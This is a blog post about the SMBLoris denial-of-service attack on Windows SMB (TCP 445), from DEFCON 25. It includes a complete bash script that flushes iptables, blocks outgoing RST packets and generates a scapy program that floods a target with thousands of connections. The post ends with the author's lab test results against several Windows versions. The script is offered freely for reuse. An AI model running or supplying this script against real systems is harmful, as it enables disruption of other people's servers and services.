Last weekend some interesting news were heard from DEFCON 25 about a new SMB Denial of Service attack technically similar to the notorious Slowloris for Apache.
Please refer to the following page for more information about SMBLoris https://smbloris.com/
There was some information available from Sam Bowne Youtube post here https://www.youtube.com/watch?v=Y77er0gzQqA
I have transferred his demonstration from his video to a single script to play around with; save how you wish ….
#!/bin/bash clear echo "***************************************************************" echo " MS Windows SMB Remote DOS - need access to TCP 445 " echo " Thx to Sam Bowne & DEFCON 25 " echo "***************************************************************" echo "[*] Checking if python-scapy module is installed " python -c "import scapy" if [ $? -ne 0 ]; then echo "[-] Scapy not found please run apt-get install python-scapy" exit 0 fi echo "[*] Scapy found " echo "[*] Setting iptables to stop RST packets " iptables -F iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP echo -e "Remote Windows SMB host IP ? \c" read ip echo -e "How many threads are we gonna use ? [90000 is good] : \c" read threads echo 'from scapy.all import *' > smb-dos.py echo 'import sys' >> smb-dos.py echo '' >> smb-dos.py echo 'p0 = int(sys.argv[1])' >> smb-dos.py echo '' >> smb-dos.py echo 'conf.L3socket' >> smb-dos.py echo 'conf.L3socket=L3RawSocket' >> smb-dos.py echo '' >> smb-dos.py echo 'i = IP()' >> smb-dos.py echo -n 'i.dst = "' >> smb-dos.py echo -n $ip >> smb-dos.py echo '"' >> smb-dos.py echo 't = TCP()' >> smb-dos.py echo 't.dport = 445' >> smb-dos.py echo '' >> smb-dos.py echo -n 'for p in range(p0,p0+' >> smb-dos.py echo -n $threads >> smb-dos.py echo '):' >> smb-dos.py echo ' print p' >> smb-dos.py echo ' t.sport = p' >> smb-dos.py echo ' t.flags = "S"' >> smb-dos.py echo '' >> smb-dos.py echo ' r = sr1(i/t)' >> smb-dos.py echo ' rt = r[TCP]' >> smb-dos.py echo ' t.ack = rt.seq + 1' >> smb-dos.py echo ' t.seq = rt.ack' >> smb-dos.py echo ' t.flags= "A"' >> smb-dos.py echo " sbss = '\x00\x01\xff\xff'" >> smb-dos.py echo ' send(i/t/sbss)' >> smb-dos.py ls -la smb-dos.py echo '[*] Running SMB DOS against $ip' sleep 2 python smb-dos.py 0 & python smb-dos.py 1000 & python smb-dos.py 2000 & python smb-dos.py 3000 & python smb-dos.py 4000 & python smb-dos.py 5000 & python smb-dos.py 6000 & python smb-dos.py 7000 & python smb-dos.py 8000 & python smb-dos.py 9000 &
The script is pretty self-explanatory, feel free to do whatever you want with it.
Here are my test results and videos for each of the Windows platforms I have ran this script against. I was using Virtual Box in Linux with internal networking. Bear in mind that you need to access TCP 445 on the remote host for this to work, so check your firewalls ;)
Windows Server 2016 – latest patches installed
-
- Memory was being slowly eaten, but after while it gets released and starts to grow again .. could have impact if more hosts were sending this attack simultaneously
- Below you can see the video of the test performed
Windows 2010 x64 – latest patches installed
-
- Same behavior observed as with Windows Server 2016; as expected.
- Below you can see the video of the test performed
Windows 7 SP1 x64 – latest patches installed
-
- Here the system came to its knees at one point, given the fact that if I would run off this attack with one more virtual machine the box would have hard times.
- Below you can see the video of the test performed
Windows Server 2003 R2 x64 – whatever patches were available back then
-
- Actually pretty stable during the attack :)
- Below you can see the video the the test performed
Thats it !
P.S I have tried against Samba on Linux … no problem so far.. but I would not be so sure .. this has a potential level of abuse .. same goes for NSF/RPC … lets see what time brings.
